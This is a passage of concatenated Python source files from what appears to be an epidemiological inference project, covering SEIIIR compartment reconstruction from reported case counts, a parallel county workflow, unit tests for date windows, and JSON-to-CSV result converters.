cases. Please see the \ndocumentation for the individual methods below.\n\"\"\"\n\ndef _transmissions_from_reported_cases(*, dates, reported_cases_per_day, reporting_factor, report_delay):\n \"\"\"\n This function computes the list of transmissions (new cases) from the reported\n cases, reporting factor, and the reporting delay. The delay doesn't impact the\n number of transmissions, but does impact the estimated dates those transmissions\n occur.\n\n Parameters\n ----------\n dates : list of python datetime objects\n The days corresponding to the reported cases as datetime objects\n reported_cases_per_day : list of numbers\n The number of reported cases within each day\n reporting_factor : number\n This is the reporting factor. 
E.g., if reporting_factor=8, then 1 in 8 \n cases are reported\n report_delay : int\n This is the number of days between infection and reporting\n \"\"\"\n assert len(dates) == len(reported_cases_per_day)\n transmissions = [reporting_factor * r for r in reported_cases_per_day]\n report_delta = timedelta(days=report_delay)\n tdates = list()\n for dt in dates:\n tdates.append(dt - report_delta)\n return Bunch(dates=tdates, values=transmissions)\n\ndef _np_transmissions_from_reported_cases(*, dates, counties, reported_cases_per_day, reporting_factor, report_delay):\n \"\"\"\n This function computes the list of transmissions (new cases) from the reported\n cases, reporting factor, and the reporting delay. The delay doesn't impact the\n number of transmissions, but does impact the estimated dates those transmissions\n occur.\n\n Parameters\n ----------\n dates : numpy array of datetime objects\n array of datetime objects corresponding to the rows of reported_cases_per_day\n counties : numpy chararray\n the names of the counties (or nodes) corresponding to the coumns in the\n reported_cases_per_day\n reported_cases_per_day : Numpy two-dimensional array\n This is a numpy array that contains the reported cases per day. Each row\n corresponds to a different day, and each column is a different county (node).\n reporting_factor : number\n This is the reporting factor. E.g., if reporting_factor=8, then 1 in 8 \n cases are reported\n report_delay : int\n This is the number of days between infection and reporting\n \"\"\"\n # check the types\n assert isinstance(dates, np.ndarray) and dates.dtype == np.object\n assert isinstance(counties, np.ndarray) and counties.dtype == np.object\n \n assert len(dates) == reported_cases_per_day.shape[0]\n assert len(counties) == reported_cases_per_day.shape[1]\n transmissions = reporting_factor * reported_cases_per_day\n report_delta = timedelta(days=report_delay)\n transmission_dates = np.asarray([dates[i] - report_delta for i in range(len(dates))])\n return Bunch(dates=transmission_dates, values=transmissions)\n\n\ndef reconstruct_states_deterministic_decay(*, dates, reported_cases_per_day, population, sigma, gamma, reporting_factor, report_delay, county=None, warnings=None):\n \"\"\"\n This function reconstructs the state of the system using the\n cumulative reported cases and assuming a constant reporting\n delay. Using this and the reporting factor, we can compute the\n approximate transmissions each day. These are then used to\n reconstruct the other states, assuming a discrete time model with\n a simple decay term for leaving the E, I1, I2, and I3\n compartments. The model is discretized by days.\n \n Parameters\n ----------\n dates : list\n list of datetime objects corresponding to the dates of the reported_cases_per_day\n\n reported_cases_per_day : list\n list of the reported cases per day\n\n population : number\n This is the overall population\n\n sigma : float\n This is the rate of transfer out of the exposed compartment (e.g., 1/(incubation period))\n\n gamma : float\n This model includes 3 infectious compartments. Therefore this is an approximation of the \n overall rate of transfer out of the I compartment. Here, we create three compartments,\n each with a rate of 3*gamma (where gamma is 1/(infectious period))\n\n reporting_factor : float\n This factor accounts for under-reporting. 
If reporting_factor=8, then 1 in 8 cases are reported\n\n report_delay : int\n This is the number of days between infection and reporting\n\n county : string\n The county name, used for debugging output\n\n warnings : list\n A list that can be used to store warnings for the user\n\n Returns\n -------\n tuple : (dates, T, S, E, I1, I2, I3, R)\n dates: dates corresponding to the states in the model\n T: list of new transmissions\n S: list of susceptible population values\n E: list of exposed population values\n I1, I2, I3: lists of infective counts in I1, I2, and I3 compartments respectively\n R: list of recovered population values\n \"\"\"\n assert population > 1\n assert sigma >=0\n assert gamma >= 0\n assert reporting_factor >= 1\n assert report_delay >= 1 and type(report_delay) is int\n\n transmissions = _transmissions_from_reported_cases(dates=dates,\n reported_cases_per_day=reported_cases_per_day,\n reporting_factor=reporting_factor,\n report_delay=report_delay)\n transmission_dates = transmissions.dates\n transmissions = transmissions.values\n\n # create lists to store compartment numbers\n S = [None]*len(transmissions)\n E = [None]*len(transmissions)\n I1 = [None]*len(transmissions)\n I2 = [None]*len(transmissions)\n I3 = [None]*len(transmissions)\n R = [None]*len(transmissions)\n\n # assume fully susceptible population to start\n S[0] = population\n E[0] = 0\n I1[0] = 0\n I2[0] = 0\n I3[0] = 0\n R[0] = 0\n\n # main simulation loop\n for t in range(len(transmissions)-1):\n delta0 = transmissions[t]\n if delta0 > S[t] and not warnings is None:\n warnings.append(\"WARNING: Cases in county %s exceeded population size (%f > %f) at time step %d. Ignoring cases that exceed population size.\" % (str(county), delta0, S[t], t))\n delta0 = S[t]\n S[t+1] = S[t] - delta0\n #if S[t+1] <= 0:\n # # print(sum(reported_cases_per_day))\n # # print(cumulative_reported_cases[-1])\n # # print(population)\n # # for idx,d in enumerate(tdates):\n # # print(d,':',S[idx], '->', transmissions[idx])\n # raise ValueError(\"reconstruct_states_deterministic_decay computed a negative\"\n # \" value for the susceptible population. This likely means that\"\n # \" the reported cases or the reporting_factor are too large\"\n # \" for the population value specified. 
This happened at \"\n # \"timestep: {} with date: {}, transmissions: {}, and S[t+1]: {}\".format(\n # t, rdates[t], transmissions[t], S[t+1])\n # )\n \n delta1 = min(sigma*E[t], E[t] + delta0)\n E[t+1] = E[t] + delta0 - delta1\n #E[t+1] = E[t] + transmissions[t] - sigma*E[t]\n #E[t+1] = max(0, E[t+1])\n assert E[t+1] >= 0\n\n delta2 = min(gamma*3*I1[t], I1[t] + delta1)\n I1[t+1] = I1[t] + delta1 - delta2\n #I1[t+1] = I1[t] + sigma*E[t] - gamma*3*I1[t]\n #I1[t+1] = max(0, I1[t+1])\n assert I1[t+1] >= 0\n \n delta3 = min(gamma*3*I2[t], I2[t] + delta2)\n I2[t+1] = I2[t] + delta2 - delta3\n #I2[t+1] = I2[t] + gamma*3*I1[t] - gamma*3*I2[t]\n #I2[t+1] = max(0, I2[t+1])\n assert I2[t+1] >= 0\n \n delta4 = min(gamma*3*I3[t], I3[t] + delta3)\n I3[t+1] = I3[t] + delta3 - delta4\n #I3[t+1] = I3[t] + gamma*3*I2[t] - gamma*3*I3[t]\n #I3[t+1] = max(0, I3[t+1])\n assert I3[t+1] >= 0\n \n R[t+1] = R[t] + delta4\n #R[t+1] = R[t] + gamma*3*I3[t]\n assert R[t+1] >= 0\n\n\n orig_rep_cases = list()\n drdict = {d:r for d,r in zip(dates,reported_cases_per_day)}\n for dt in transmission_dates:\n if dt in drdict:\n orig_rep_cases.append(drdict[dt])\n else:\n orig_rep_cases.append(0)\n\n return Bunch(dates=transmission_dates, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=transmissions, orig_rep_cases=orig_rep_cases)\n\ndef np_reconstruct_states_deterministic_decay(*, dates, counties, reported_cases_per_day, populations, sigma, gamma, reporting_factor, report_delay):\n \"\"\"\n This function reconstructs the state of the system using the\n cumulative reported cases and assuming a constant reporting\n delay. Using this and the reporting factor, we can compute the\n approximate transmissions each day. These are then used to\n reconstruct the other states, assuming a discrete time model with\n a simple decay term for leaving the E, I1, I2, and I3\n compartments. The model is discretized by days.\n \n Parameters\n ----------\n dates : numpy array of datetime objects\n array of datetime objects corresponding to the rows of reported_cases_per_day\n counties : numpy array of objects (strings)\n the names of the counties (or nodes) corresponding to the coumns in the\n reported_cases_per_day\n reported_cases_per_day : Numpy two-dimensional array\n This is a numpy array that contains the reported cases per day. Each row\n corresponds to a different day, and each column is a different county (node).\n populations : numpy array of populations\n This is an array of populations. Each entry corresponds to one of the counties\n sigma : float\n This is the rate of transfer out of the exposed compartment (e.g., 1/(incubation period))\n gamma : float\n This model includes 3 infectious compartments. Therefore this is an approximation of the \n overall rate of transfer out of the I compartment. Here, we create three compartments,\n each with a rate of 3*gamma (where gamma is 1/(infectious period))\n reporting_factor : float\n This factor accounts for under-reporting. 
If reporting_factor=8, then 1 in 8 cases are reported\n\n report_delay : int\n This is the number of days between infection and reporting\n\n Returns\n -------\n Bunch : (like a dict with keys: dates, S, E, I1, I2, I3, R, transmissions)\n dates: dates corresponding to the states in the model\n S: numpy array of susceptible population values\n E: numpy array of exposed population values\n I1, I2, I3: numpy arrays of infective counts in I1, I2, and I3 compartments respectively\n R: numpy array of recovered population values\n transmissions: numpy array of transmissions (from S->E) \n \"\"\"\n # check the types\n assert isinstance(dates, np.ndarray) and dates.dtype == np.object\n assert isinstance(counties, np.ndarray) and counties.dtype == np.object\n assert isinstance(reported_cases_per_day, np.ndarray) and reported_cases_per_day.dtype == np.float\n \n ndates = len(dates)\n ncounties = len(counties)\n assert reported_cases_per_day.shape[0] == ndates\n assert reported_cases_per_day.shape[1] == ncounties\n \n assert np.all(populations > 0)\n assert sigma >=0\n assert gamma >= 0\n assert reporting_factor >= 1\n assert report_delay >= 1 and type(report_delay) is int\n\n transmissions = \\\n _np_transmissions_from_reported_cases(dates=dates,\n counties=counties,\n reported_cases_per_day=reported_cases_per_day,\n reporting_factor=reporting_factor,\n report_delay=report_delay)\n transmission_dates = transmissions.dates\n transmissions = transmissions.values\n\n # create arrays to store compartment numbers\n S = np.NaN*np.zeros((ndates,len(counties)))\n E = np.NaN*np.zeros((ndates,len(counties)))\n I1 = np.NaN*np.zeros((ndates,len(counties)))\n I2 = np.NaN*np.zeros((ndates,len(counties)))\n I3 = np.NaN*np.zeros((ndates,len(counties)))\n R = np.NaN*np.zeros((ndates,len(counties)))\n\n # assume fully susceptible population to start\n S[0,:] = populations\n E[0,:] = 0\n I1[0,:] = 0\n I2[0,:] = 0\n I3[0,:] = 0\n R[0,:] = 0\n \n # main simulation loop\n for t in range(ndates-1):\n delta0 = transmissions[t,:]\n if np.any(delta0 > S[t,:]):\n print(\"WARNING: cases exceeded population size. 
Ignoring cases that exceed population size.\")\n delta0 = np.minimum(delta0, S[t,:])\n S[t+1,:] = S[t,:] - delta0\n \n delta1 = np.minimum(sigma*E[t,:], E[t,:] + delta0)\n E[t+1,:] = E[t,:] + delta0 - delta1\n\n delta2 = np.minimum(gamma*3*I1[t,:], I1[t,:] + delta1)\n I1[t+1,:] = I1[t,:] + delta1 - delta2\n \n delta3 = np.minimum(gamma*3*I2[t,:], I2[t,:] + delta2)\n I2[t+1,:] = I2[t,:] + delta2 - delta3\n \n delta4 = np.minimum(gamma*3*I3[t,:], I3[t,:] + delta3)\n I3[t+1,:] = I3[t,:] + delta3 - delta4\n \n R[t+1,:] = R[t,:] + delta4\n\n assert np.any(np.isfinite(S))\n assert np.any(np.isfinite(E))\n assert np.any(np.isfinite(I1))\n assert np.any(np.isfinite(I2))\n assert np.any(np.isfinite(I3))\n assert np.any(np.isfinite(R))\n assert np.any(np.isfinite(transmissions))\n \n return Bunch(dates=transmission_dates, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=transmissions)\n\n" }, { "alpha_fraction": 0.6107514500617981, "alphanum_fraction": 0.6133019328117371, "avg_line_length": 32.973331451416016, "blob_id": "75076abba2be9e2dbb8d7820e559d0403b28874a", "content_id": "be1d00a25c9272e30598d1d412b3721529ab80a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5097, "license_type": "no_license", "max_line_length": 180, "num_lines": 150, "path": "/epi_inference/workflow/precon_deterministic_delay_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run']\n\nimport sys\nimport datetime\nimport pandas as pd\nfrom pyutilib.misc import timing\ntry:\n import joblib\n joblib_available = True\nexcept:\n joblib_available = False\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\nfrom ..util import load_population, save_results\nfrom ..collect.misc import load_collect\nfrom ..reconstruction.deterministic import reconstruct_states_deterministic_decay\nfrom ..reconstruction.common import reported_cases_from_cumulative\n\n\ndef run_county(county, df, population, CONFIG, warnings):\n #\n # Initialize results dictionary\n #\n results = {'FIPS':county}\n for key, value in CONFIG.get('factor_levels',{}).items():\n if not key in results:\n results[key] = value\n #\n # Get the cumulative cases\n #\n cumulative_reported_cases = df[county].to_list()\n if df[county][-1] == 0:\n warnings.append( \"WARNING: County %s has no reported cases\" % str(county))\n return results\n\n # reconstruct the states\n Cdates = [datetime.date.fromisoformat(day) for day in df.index.to_list()]\n reported_cases_per_day = \\\n reported_cases_from_cumulative(dates=Cdates,\n cumulative_reported_cases=cumulative_reported_cases)\n\n res = reconstruct_states_deterministic_decay(dates=reported_cases_per_day.dates,\n reported_cases_per_day=reported_cases_per_day.values,\n population=population,\n sigma=CONFIG['sigma'],\n gamma=CONFIG['gamma']/3,\n reporting_factor=CONFIG['reporting_factor'],\n report_delay=CONFIG['deltaP'])\n\n # TODO - keep rdates and rcases?\n #results['rdates'] = reported_cases_per_day.dates\n #results['rcases'] = reported_cases_per_day.values\n results['dates'] = res.dates\n results['T'] = res.transmissions\n results['S'] = res.S\n results['E'] = res.E\n results['I1'] = res.I1\n results['I2'] = res.I2\n results['I3'] = res.I3\n results['R'] = res.R\n results['population'] = population\n\n return results\n\n\ndef run(CONFIG, warnings):\n #\n # Load the population data\n #\n population_df = load_population(CONFIG['population_csv']['file'], 
CONFIG['population_csv']['index'])\n #\n # Load the case data \n #\n df = load_collect(CONFIG['input_csv'])\n #\n # Perform construction\n #\n results = []\n if 'county' in CONFIG:\n counties = [CONFIG['county']]\n else:\n counties = list(df.keys())\n\n parallel = ('parallel' in CONFIG) and (len(counties) >= CONFIG['parallel'].get('number_of_counties',10))\n\n if parallel and np > 1:\n if CONFIG['verbose']:\n timing.tic()\n available_counties = []\n for t in counties:\n if t not in population_df[CONFIG['population_csv']['population']]:\n warnings.append(\"WARNING: county %s does not have population data available\" % str(t))\n continue\n available_counties.append(t)\n np = CONFIG['parallel'].get('np',2)\n if CONFIG['verbose']:\n timing.toc(\"Parallel Setup\")\n #\n with joblib.Parallel(n_jobs=np) as parallel:\n unordered_results = parallel( joblib.delayed(run_county)(t, df, population_df[CONFIG['population_csv']['population']][t], CONFIG, warnings) for t in available_counties)\n if CONFIG['verbose']:\n timing.toc(\"Parallel Execution\")\n #\n # Order the results\n #\n tmp = {res['FIPS'] : res for res in unordered_results}\n for t in available_counties:\n results.append( tmp[t] )\n if CONFIG['verbose']:\n timing.toc(\"Reorder Results\")\n else:\n if CONFIG['verbose']:\n timing.tic()\n for t in counties:\n if t not in population_df[CONFIG['population_csv']['population']]:\n warnings.append(\"WARNING: county %s does not have population data available\" % str(t))\n continue\n results.append( run_county(t, df, population_df[CONFIG['population_csv']['population']][t], CONFIG, warnings) )\n if CONFIG['verbose']:\n timing.tic(\"Serial Execution\")\n #\n # Save results\n #\n save_results(results, CONFIG['output_json'])\n save_metadata(CONFIG, warnings)\n\n\nclass ParallelReconstructionDeterministicDelay(Task):\n\n def __init__(self):\n Task.__init__(self, \"parallel_reconstruction_deterministic_delay\",\n \"Perform compartment reconstruction using a deterministic delay.\")\n\n def validate(self, args):\n pass\n\n def run(self, data, CONFIG):\n if not joblib_available:\n raise RuntimeError(\"ERROR: Cannot execute the parallel_reconstruction_determinstic_delay workflow. 
The 'joblib' package is missing.\")\n self._warnings = []\n run(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nregister_task(ParallelReconstructionDeterministicDelay())\n\n" }, { "alpha_fraction": 0.4978303611278534, "alphanum_fraction": 0.5854043364524841, "avg_line_length": 35.73188400268555, "blob_id": "6c4d1a236f94d88031fcac90f39621ac7b2dc9f0", "content_id": "959422026bf00111bafbaa3803dbd99d4b22a157", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5070, "license_type": "no_license", "max_line_length": 78, "num_lines": 138, "path": "/epi_inference/formulations/tests/test_unit.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\nimport shutil\nimport datetime\n\n#from pyomo.common import fileutils as fileutils\n#from pyutilib.misc import Options as Options\nfrom epi_inference.formulations.util import get_windows\nfrom epi_inference.formulations.util import indices_since_first_nonzero\n\nclass TestWindow():\n\n def test1(self):\n # Default values\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-19)) for i in range(20)]\n ans = get_windows(dates)\n\n assert(ans.TIMES == list(range(20)))\n assert(ans.WINDOWS == [11,18])\n wt = {11: [5, 6, 7, 8, 9, 10, 11], 18: [12, 13, 14, 15, 16, 17, 18]}\n assert(ans.WINDOW_TIMES == wt)\n assert(ans.WINDOW_TIMES_LIST == [(i,j) for i in wt for j in wt[i]])\n\n def test2(self):\n # Selected a date that wasn't a valid window\n last = datetime.date.fromisoformat('2020-06-14')\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-19)) for i in range(20)]\n ans = get_windows(dates, select_window='2020-06-14')\n\n assert(ans.TIMES == list(range(20)))\n assert(ans.WINDOWS == [])\n wt = {}\n assert(ans.WINDOW_TIMES == wt)\n\n def test3(self):\n # Selected a valid date \n last = datetime.date.fromisoformat('2020-06-14')\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-19)) for i in range(20)]\n ans = get_windows(dates, select_window='2020-06-13')\n\n assert(ans.TIMES == list(range(20)))\n assert(ans.WINDOWS == [18])\n wt = {18: [12, 13, 14, 15, 16, 17, 18]}\n assert(ans.WINDOW_TIMES == wt)\n\n def Xtest4_fails(self):\n # Shouldn't this pass?\n last = datetime.date.fromisoformat('2020-06-14')\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-19)) for i in range(20)]\n ans = get_windows(dates, window_days=5)\n\n assert(ans.TIMES == list(range(20)))\n assert(ans.WINDOWS == [4, 11,18])\n wt = {4: [0,1,2,3,4], 11: [7, 8, 9, 10, 11], 18: [14, 15, 16, 17, 18]}\n assert(ans.WINDOW_TIMES == wt)\n assert(ans.WINDOW_TIMES_LIST == [(i,j) for i in wt for j in wt[i]])\n\n def test4_succeeds(self):\n # Why isn't the first window included?\n last = datetime.date.fromisoformat('2020-06-14')\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-19)) for i in range(20)]\n ans = get_windows(dates, window_days=5)\n\n assert(ans.TIMES == list(range(20)))\n assert(ans.WINDOWS == [11,18])\n wt = {11: [7, 8, 9, 10, 11], 18: [14, 15, 16, 17, 18]}\n assert(ans.WINDOW_TIMES == wt)\n assert(ans.WINDOW_TIMES_LIST == [(i,j) for i in wt for j in wt[i]])\n\n\n def test5(self):\n # Shouldn't this pass?\n last = datetime.date.fromisoformat('2020-06-14')\n last = datetime.date.fromisoformat('2020-06-14')\n 
dates=[str(last+datetime.timedelta(days=i-29)) for i in range(30)]\n ans = get_windows(dates, window_days=14)\n\n assert(ans.TIMES == list(range(30)))\n assert(ans.WINDOWS == [14, 21, 28])\n wt = {14: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],\n 21: [8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21],\n 28: [15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28]}\n assert(ans.WINDOW_TIMES == wt)\n assert(ans.WINDOW_TIMES_LIST == [(i,j) for i in wt for j in wt[i]])\n\n def test6(self):\n # Default values\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-19)) for i in range(20)]\n ans = get_windows(dates, last_day_of_window=6) # Monday - Sunday\n\n assert(ans.TIMES == list(range(20)))\n assert(ans.WINDOWS == [12,19])\n wt = {12: [6, 7, 8, 9, 10, 11, 12], 19: [13, 14, 15, 16, 17, 18, 19]}\n assert(ans.WINDOW_TIMES == wt)\n assert(ans.WINDOW_TIMES_LIST == [(i,j) for i in wt for j in wt[i]])\n \ndef test_indices_since_first_nonzero():\n data = [0]*100\n data[95] = 1\n indices = indices_since_first_nonzero(data)\n\n #assert sum(indices) == 15\n #assert sum(indices[:93]) == 0\n expected = [0]*100\n expected[95] = 0\n expected[96] = 1\n expected[97] = 2\n expected[98] = 3\n expected[99] = 4\n print(indices)\n print(expected)\n for i in range(100):\n assert indices[i] == expected[i]\n \ndef test_indices_since_first_nonzero_zero():\n data = [0]*100\n indices = indices_since_first_nonzero(data)\n assert len(indices) == 100\n print(indices)\n for v in indices:\n assert v == 0\n\ndef test_indices_since_first_nonzero_filled():\n data = [1]*100\n indices = indices_since_first_nonzero(data)\n assert len(indices) == 100\n expected = [i for i in range(100)]\n print(indices)\n print(expected)\n for i in range(100):\n assert indices[i] == expected[i]\n\n" }, { "alpha_fraction": 0.528663158416748, "alphanum_fraction": 0.5316365361213684, "avg_line_length": 32.494022369384766, "blob_id": "1123a2ae78f9aa71df221520861d0a58451137e6", "content_id": "e7119a0db5661ee736a3e3ca4ab1927fbcb62764", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8408, "license_type": "no_license", "max_line_length": 141, "num_lines": 251, "path": "/epi_inference/reconstruction/recon_json2csv_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['recon_single_json2csv', 'recon_many_json2csv']\n\nimport sys\nimport os.path\ntry:\n import ujson as json\nexcept:\n import json\nimport csv\nimport glob\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\n\ndef write_wide(OUTPUT, raw, counties):\n counties = set(counties)\n OUTPUT.write('comp,')\n sorted_fips = list(sorted(raw.keys()))\n for fips in sorted_fips:\n if fips not in counties:\n continue\n OUTPUT.write('\"%s\",' % fips)\n OUTPUT.write(\"time\\n\")\n for d in range(len(raw[fips]['dates'])):\n for s in ['S', 'E', 'I1', 'I2', 'I3', 'R']:\n OUTPUT.write('\"%s\",' % s)\n for fips in sorted_fips:\n if fips not in counties:\n continue\n OUTPUT.write(\"%s,\" % str(raw[fips][s][d]))\n OUTPUT.write('\"%s\"\\n' % raw[fips]['dates'][d])\n\n\ndef write_flattened(OUTPUT, input_json_files, counties):\n counties = set(counties)\n first = True\n series = ['dates', 'transmissions', 'S', 'E', 'I1', 'I2', 'I3', 'R', 'orig_rep_cases']\n values = []\n\n for filename in glob.glob(input_json_files):\n if not os.path.exists(filename):\n raise RuntimeError(\"ERROR: Reconstruction JSON 
file does not exist: \"+ filename)\n #\n with open(filename,'r') as INPUT:\n raw = json.load(INPUT)\n\n if first:\n #\n # Process the first JSON file\n #\n if len(counties) == 0:\n counties = list(sorted(raw.keys()))\n for fips in raw:\n curr = raw[fips]\n if 'E' not in curr:\n continue\n for key in sorted(curr.keys()):\n if key in series or key in values:\n continue\n elif key != \"FIPS\":\n values.append( key )\n break\n #\n OUTPUT.write(\"FIPS,\"+\",\".join(values+series))\n OUTPUT.write(\"\\n\")\n first=False\n\n rows = []\n for fips in counties:\n if not fips in raw:\n continue\n for d in range(len(raw[fips]['dates'])):\n row = []\n row.append('\"%s\"' % fips)\n for val in values:\n row.append('%s' % str(raw[fips][val]))\n for s in series:\n row.append('%s' % str(raw[fips][s][d]))\n rows.append(\",\".join(row))\n OUTPUT.write(\"\\n\".join(rows))\n OUTPUT.write(\"\\n\")\n sys.stdout.write(\".\")\n sys.stdout.flush()\n\n sys.stdout.write(\"\\n\")\n\n\ndef write_narrow(OUTPUT, input_json_files, counties):\n counties = set(counties)\n first = True\n series = ['transmissions', 'S', 'E', 'I1', 'I2', 'I3', 'R', 'orig_rep_cases']\n values = []\n\n for filename in glob.glob(input_json_files):\n if not os.path.exists(filename):\n raise RuntimeError(\"ERROR: Reconstruction JSON file does not exist: \"+ filename)\n #\n with open(filename,'r') as INPUT:\n raw = json.load(INPUT)\n\n if first:\n #\n # Process the first JSON file\n #\n if len(counties) == 0:\n counties = list(sorted(raw.keys()))\n for fips in raw:\n curr = raw[fips]\n if 'E' not in curr:\n continue\n for key in sorted(curr.keys()):\n if key in series or key in values or key == 'dates':\n continue\n elif key != \"FIPS\":\n values.append( key )\n break\n #\n OUTPUT.write(\"fips,\"+\",\".join(values)+\",date,series,value\")\n OUTPUT.write(\"\\n\")\n first=False\n\n rows = []\n for fips in counties:\n if not fips in raw:\n continue\n prefix = []\n prefix.append('\"%s\"' % fips)\n for val in values:\n prefix.append('%s' % str(raw[fips][val]))\n for d in range(len(raw[fips]['dates'])):\n for s in series:\n appendix = ['%s' % str(raw[fips]['dates'][d]), \n s,\n '%s' % str(raw[fips][s][d])]\n rows.append(\",\".join(prefix+appendix))\n OUTPUT.write(\"\\n\".join(rows))\n OUTPUT.write(\"\\n\")\n sys.stdout.write(\".\")\n sys.stdout.flush()\n\n sys.stdout.write(\"\\n\")\n\n\ndef recon_single_json2csv(input_json, output_csv=None, datadir=None, csv_format=None, counties=None):\n if datadir:\n full_infile = os.path.join(datadir, input_json)\n else:\n full_infile = input_json\n if not os.path.exists(full_infile):\n raise RuntimeError(\"ERROR: Reconstruction JSON file does not exist: \"+ full_infile)\n #\n print(\"Processing reconstruction file: \"+full_infile)\n with open(full_infile,'r') as INPUT:\n raw = json.load(INPUT)\n\n # Figure out CSV output filename\n if output_csv:\n pass\n elif input_json.endswith('jsn'):\n output_csv = input_json[:-4]+\".csv\"\n elif input_json.endswith('json'):\n output_csv = input_json[:-5]+\".csv\"\n else:\n raise RuntimeError(\"ERROR: Cannot infer CSV output file name\")\n if datadir:\n full_outfile = os.path.join(datadir,output_csv)\n else:\n full_outfile = output_csv\n\n # Write CSV file\n print(\"Writing results summary: \"+full_outfile)\n if csv_format == 'wide':\n with open(full_outfile,'w') as OUTPUT:\n write_wide(OUTPUT, raw, counties)\n elif csv_format == 'flatten':\n with open(full_outfile,'w') as OUTPUT:\n write_flattened(OUTPUT, full_infile, counties)\n else:\n with open(full_outfile,'w') as OUTPUT:\n 
write_narrow(OUTPUT, full_infile, counties)\n\n\ndef recon_many_json2csv(input_json_files, output_csv=None, datadir=None, counties=None, csv_format=None):\n # Figure out CSV output filename\n if datadir:\n full_outfile = os.path.join(datadir,output_csv)\n else:\n full_outfile = output_csv\n\n # Write CSV file\n print(\"Writing results summary: \"+full_outfile)\n if csv_format == 'flatten':\n with open(full_outfile,'w') as OUTPUT:\n write_flattened(OUTPUT, input_json_files, counties)\n else:\n with open(full_outfile,'w') as OUTPUT:\n write_narrow(OUTPUT, input_json_files, counties)\n\n\nclass Recon_JSON2CSV_Workflow(Task):\n\n def __init__(self):\n Task.__init__(self, \"recon_json2csv\",\n \"Convert reconstruction JSON to CSV.\")\n\n def validate(self, CONFIG):\n valid_options = set(['format', 'input_json', 'counties', 'output_csv', 'datadir', 'verbose', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n recon_single_json2csv(\n CONFIG['input_json'],\n output_csv=CONFIG.get('output_csv',None),\n datadir=CONFIG.get('datadir',None),\n counties=CONFIG.get('counties',[]),\n csv_format=CONFIG.get('format','narrow'))\n\n\nregister_task(Recon_JSON2CSV_Workflow())\n\n\nclass Recon_Many_JSON2CSV_Workflow(Task):\n\n def __init__(self):\n Task.__init__(self, \"recon_many_json2csv\",\n \"Create a CSV file summarizing reconstructions in JSON files.\")\n\n def validate(self, CONFIG):\n valid_options = set(['format', 'input_json', 'counties', 'output_csv', 'datadir', 'verbose', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n recon_many_json2csv(\n CONFIG['input_json'],\n counties=CONFIG.get('counties',[]),\n output_csv=CONFIG.get('output_csv',None),\n datadir=CONFIG.get('datadir',None),\n csv_format=CONFIG.get('format','narrow'))\n\n\nregister_task(Recon_Many_JSON2CSV_Workflow())\n\n" }, { "alpha_fraction": 0.6085843443870544, "alphanum_fraction": 0.6194366812705994, "avg_line_length": 45.834285736083984, "blob_id": "b60a7c76e1e00ec2f204905e311a0ca665eef0ba", "content_id": "eb53785d6756480998f266517bf8d2baca991173", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8201, "license_type": "no_license", "max_line_length": 152, "num_lines": 175, "path": "/epi_inference/evaluation/reconstruction/florida-epiinf/bin/reconstruction_figs.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pandas as pd\npd.set_option(\"display.max_rows\", None)\nimport os\nfrom epi_inference.reconstruction.common import reported_cases_from_cumulative\nfrom epi_inference.reconstruction.stochastic import stochastic_reconstruction\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\n\"\"\"\nThis module runs reconstructions on data from a stochastic simulation\nand produces some figures showing the results.\n\"\"\"\n\ndef compare_florida_reconstruction(seiiir_fname, det_recon_fname, recon_folder_name, geodata_fname, output_path):\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n # read the true data from the SEIIIR simulation\n seirdf = pd.read_csv(seiiir_fname, parse_dates=['Date'])\n 
